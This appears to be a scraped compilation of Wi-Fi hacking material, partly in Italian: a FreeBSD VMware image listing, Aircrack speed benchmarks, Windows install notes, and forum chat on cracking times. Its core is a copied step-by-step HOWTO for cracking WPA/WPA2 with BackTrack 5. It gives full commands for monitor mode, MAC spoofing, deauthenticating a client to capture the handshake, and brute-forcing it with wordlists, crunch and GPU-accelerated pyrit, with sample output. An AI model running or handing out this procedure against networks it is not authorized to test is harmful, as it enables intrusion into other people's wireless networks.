FreeBSD 8.2 - Vmware Image

http://www.thoughtpolice.co.uk/vmware/

FreeBSD 8.2, standard install. new! permalink

Notes: Root password is "thoughtpolice"
Quick start HOWTO: soon! For now see FreeBSD 7.0 in 1 minute

32-bit: freebsd-8.2-i386.zip, 183M
fast torrent download!, web download
md5sum: d118c69806c92c14b7629693387e3c7a

64-bit: freebsd-8.2-amd64.zip, 198M
fast torrent download!, web download
md5sum: 3d7a88dc0e68db6310ead029f33dc928

AirCrack performance su Intel I7 in ambiente Windows

Ecco le performance di Aircrack sul mio PC Intel I7 (Win7 Utlimate 64)

Sembra tenere una media di 4300 parole al secondo.

Il mio portatile Centrino2 a 1,6Ghz fa una media di 800 parole/s

Tra breve test con PYRIT / CUDA con nvidia 8800GT! Dovremmo passare le 10.000 parole/s!!!!

Questi sono i dati della CPU (un pelino overclockata!)

Crack WPA/WPA2 con BackTrack 5 + Pyrit

http://samiux.blogspot.com/2011/05/howto-wpawpa2-cracking-with-backtrack-5.html

HOWTO : WPA/WPA2 cracking with Back|Track 5

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.

Installing Aircrack-ng for Windows

http://wirelessdefence.org/Contents/Aircrack-ng_WinInstall.htm

Installing Aircrack-ng for Windows:

Last Update: April 2010

Project Homepage: http://www.aircrack-ng.org/doku.php

NOTE: Only a relatively small number of Wireless cards are supported under the Windows version of Aircrack-ng .  See the Project Homepages compatibility list for full details.

NOTE: For the standard user we recommend not using greater than version aircrack-ng-0.9.3-win as aircrack-ng-1.0-winand above requires the use of cygwin and custom .dll files.

Ensure you have the appropriate windows monitor mode drivers installed for your card (not the standard drivers that came with your card).

Download aircrack-ng-0.9.3-win.zip for Windows from: http://www.aircrack-ng.org/ 

Download Peek.zip which contains: PEEK.DLL, PEEK5.SYS and MSVCR70.DLL from http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/winxp/Peek.zip

Extract aircrack-ng-0.9.3.zip to C:\

Extract Peek.zip (i.e. the files Peek.dll, Peek5.sys and msvcr70.dll) into the directory: C:\aircrack-0.9.3-win\bin

cd C:\aircrack-ng-0.9.3-win\bin

Run airodump-ng.exe or aircrack-ng GUI.exe and hopefully you'll have an interactive window to interact with your wireless card.

Job done : )

There is a nice troubleshooting guide on the project homepage if you have any issues: http://aircrack-ng.org/doku.php?id=airodump-ng#windows_specific

Back to Aircrack-ng Windows Main

Reg ha scritto:
praticamente se sono in presenza di Ap con Wap2 ho bisogno per forza di cose di un client collegato
Ho capito bene..??

Si! Hai capito bene. Anche con wpa.
Provato! Funziona. Il cracking poi viene fatto off-line.
Il problema è che il criptaggio è abbastanza pesante.
Il mio Centrino 2 (portatile) fa 800 parole al secondo.
Su una bella macchina potremmo arrivare anche a 10.000 (?)
Con dizionari giganteschi (ne ho trovato uno da 10 giga!) occorrerebbero comunque dei giorni e con scarsa probabilità.

Se per esempio la pwd è: DEgf!2wa  diventa già abbastanza difficile..

Password composte da nomi, date, marche sarebbero da evitare.

Gli attacchi brute-force in questo caso non hanno senso (256 bit!!).
As of August 17, 2010, distributed.net estimates that cracking a 72-bit key using current hardware will take about 48,712 days or 133.5 years